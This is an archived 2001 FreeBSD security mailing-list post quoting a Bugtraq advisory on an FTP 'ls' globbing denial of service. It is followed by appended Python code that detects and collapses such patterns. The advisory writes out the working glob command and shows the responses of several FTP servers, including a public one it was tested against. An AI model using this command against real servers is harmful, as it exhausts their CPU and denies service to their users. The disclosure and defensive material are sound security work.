From owner-freebsd-security Fri Mar 16 5:52:42 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mailgate.kechara.net (mailgate.kechara.net [62.49.139.2]) by hub.freebsd.org (Postfix) with ESMTP id 8A08037B718 for ; Fri, 16 Mar 2001 05:52:37 -0800 (PST) (envelope-from lee@kechara.net)
Received: from area57 (lan-fw.kechara.net [62.49.139.3]) by mailgate.kechara.net (8.9.3/8.9.3) with SMTP id PAA16561 for ; Fri, 16 Mar 2001 15:02:57 GMT
Message-Id: <200103161502.PAA16561@mailgate.kechara.net>
Date: Fri, 16 Mar 2001 13:56:08 -0000
To: freebsd-security@freebsd.org
From: Lee Smallbone
Subject: Re: Multiple vendors FTP denial of service (fwd)
Reply-To: lee@kechara.net
Organization: Kechara Internet
X-Mailer: Opera 5.02 build 856a
X-Priority: 3 (Normal)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii";
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

4.2-RELEASE, regular user, regular home directory

(snipped)
/../www/62.49.139.3_3-year.png
www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www
/../www/62.49.139.3_3.html
www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www
/../www/btareshit.png
www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www
/../www/62.49.139.3_3.old
226 Transfer complete.
ftp: 5740 bytes received in 0.11Seconds 52.66Kbytes/sec.
ftp>

15/03/2001 22:21:16, Attila Nagy wrote:
>FreeBSD isn't listed, but also vulnerable, at least with the FTPd in
>-STABLE.
>
>---------- Forwarded message ----------
>Date: Thu, 15 Mar 2001 09:34:09 +0100
>From: "Frank DENIS (Jedi/Sector One)"
>To: BUGTRAQ@SECURITYFOCUS.COM
>Subject: Multiple vendors FTP denial of service
>
>- Proftpd built-in 'ls' command has a globbing bug that allows remote
>denial-of-service.
>
> Here's a simple exploit, tested on the Proftpd site :
>
>$ ftp ftp.proftpd.org
>...
>Name (ftp.proftpd.org:j): ftp
>...
>230 Anonymous access granted, restrictions apply.
>Remote system type is UNIX.
>Using binary mode to transfer files.
>ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
>227 Entering Passive Mode (216,10,40,219,4,111).
>421 Service not available, remote server timed out. Connection closed
>
> That command takes 100% CPU time on the server. It can lead into an easy
>DOS even if few remote simultaneous connections are allowed.
>
> Other FTP servers may be concerned as well. Here are various tries :
>
>- NetBSD FTP showed the same behavior as Proftpd :
>
>ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
>200 EPRT command successful.
>(long delay)
>421 Service not available, remote server timed out. Connection closed
>
>So NetBSD-ftpd 20000723a may also consume 100% cpu time, resulting in a
>possible DOS. Other BSD FTP may be affected as well.
>
>- Microsoft FTP Service (Version 5.0) seems also confused by the command :
>ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
>500 'EPSV': command not understood
>227 Entering Passive Mode (207,46,133,140,4,223).
>200 PORT command successful.
>150 Opening ASCII mode data connection for file list.
>(very long delay... nothing happens...)
>
>- Publicfile refuses the command :
>
>ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
>227 =131,193,178,181,97,222
>550 Sorry, I can't open that file: file does not exist.
>
>- Wu-FTPd 2.6.1 is not vulnerable. Only the result of 'ls *' is computed and
>displayed.
>
>- PureFTPd (any version) is not vulnerable. Result is "Simplified wildcard
>expression to *" and the 'ls *' output.
>
>
> Maintainers of vulnerable servers have been warned of this bug.
>
>-- 
> -=- Frank DENIS aka Jedi/Sector One < spam@jedi.claranet.fr > -=-
> LINAGORA SA (Paris, France) : http://www.linagora.com
>
>
>
>To Unsubscribe: send mail to majordomo@FreeBSD.org
>with "unsubscribe freebsd-security" in the body of the message
>

-- 
Lee Smallbone
Kechara Internet
lee@kechara.net
www.kechara.net
Tel: (01243) 869 969
Fax: (01243) 866 685
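The thread above shows two defensive outcomes: wu-ftpd and PureFTPd collapse the pattern to `ls *` instead of expanding it, while the FreeBSD ftpd output at the top of Lee's message lists the same files once per matched path. The following is an added example, not code from the post or from any of the FTP servers it names; it models the "Simplified wildcard expression to *" behaviour as a pre-check a LIST/NLST handler can run before calling the glob engine. It assumes a glob implementation where `*`, `?` and `[...]` expand per path component, and the wildcard budget of 2 is an assumed policy value. The pattern built at the bottom is constructed to have the same shape as the one in the post.

```python
# Added example (not from the mailing-list post or from any named FTP server):
# vet a client-supplied LIST/NLST argument before it reaches the glob engine.
import re

# Characters that make a path component a wildcard for a typical glob
# implementation (assumption: '*', '?' and '[...]' expand per component).
WILDCARD_RE = re.compile(r"[*?\[]")


def split_components(pattern: str) -> list[str]:
    """Split a client-supplied path on '/', dropping empty and '.' parts."""
    return [c for c in pattern.split("/") if c not in ("", ".")]


def count_wildcard_components(pattern: str) -> int:
    """Number of path components the glob engine would have to expand."""
    return sum(1 for c in split_components(pattern) if WILDCARD_RE.search(c))


def worst_case_candidates(pattern: str, entries_per_dir: int) -> int:
    """Upper bound on the paths a naive glob walks.

    Every wildcard component can match every entry of the directory it is
    applied to, and a following '..' returns to the same parent, so the
    branches multiply instead of narrowing: '*/../*/../*' over directories
    with n entries is bounded by n**3, all of it resolving to the same names.
    """
    return entries_per_dir ** count_wildcard_components(pattern)


def simplify_wildcard(pattern: str) -> str:
    """Collapse every 'wildcard/..' pair.

    Whatever directory '*' selects, '..' leads straight back to the directory
    the pattern started in, so 'X/../rest' with wild X lists the same names
    as 'rest' (repeated once per match, as in the FreeBSD output above).
    Dropping the pair keeps the listing and removes the multiplicative work.
    Literal components are left alone: 'www/..' costs nothing to resolve.
    """
    stack: list[str] = []
    for comp in split_components(pattern):
        if comp == ".." and stack and WILDCARD_RE.search(stack[-1]):
            stack.pop()  # 'wild/..' is a no-op for the resulting listing
            continue
        stack.append(comp)
    return "/".join(stack) or "."


def vet_list_argument(pattern: str, max_wildcards: int = 2) -> tuple[bool, str]:
    """Return (accepted, pattern_to_glob).

    The pattern is simplified first; if it still carries more wildcard
    components than the server is willing to expand, it is refused and the
    caller should answer with a 5xx reply instead of running the glob.
    The budget of 2 is an assumed policy value, not something from the post.
    """
    simplified = simplify_wildcard(pattern)
    if count_wildcard_components(simplified) > max_wildcards:
        return False, simplified
    return True, simplified


if __name__ == "__main__":
    # Constructed pattern with the same shape as the one in the post.
    attack_shape = "/../".join(["*"] * 13)
    print(attack_shape)
    print("wildcard components:", count_wildcard_components(attack_shape))
    print("naive candidates with 50 entries per dir:",
          worst_case_candidates(attack_shape, 50))
    print("vetted as:", vet_list_argument(attack_shape))
```

The simplification deliberately yields a superset listing in the corner case where the start directory has no subdirectories (a strict `*/../*` would then match nothing, `*` matches the files); for a directory listing that is harmless, and it is the trade the servers the post calls "not vulnerable" appear to make. Patterns that stay wide after simplification, such as `*/*/*/*`, are refused outright rather than budgeted by time, because a CPU-time cap still lets a handful of connections pin the server.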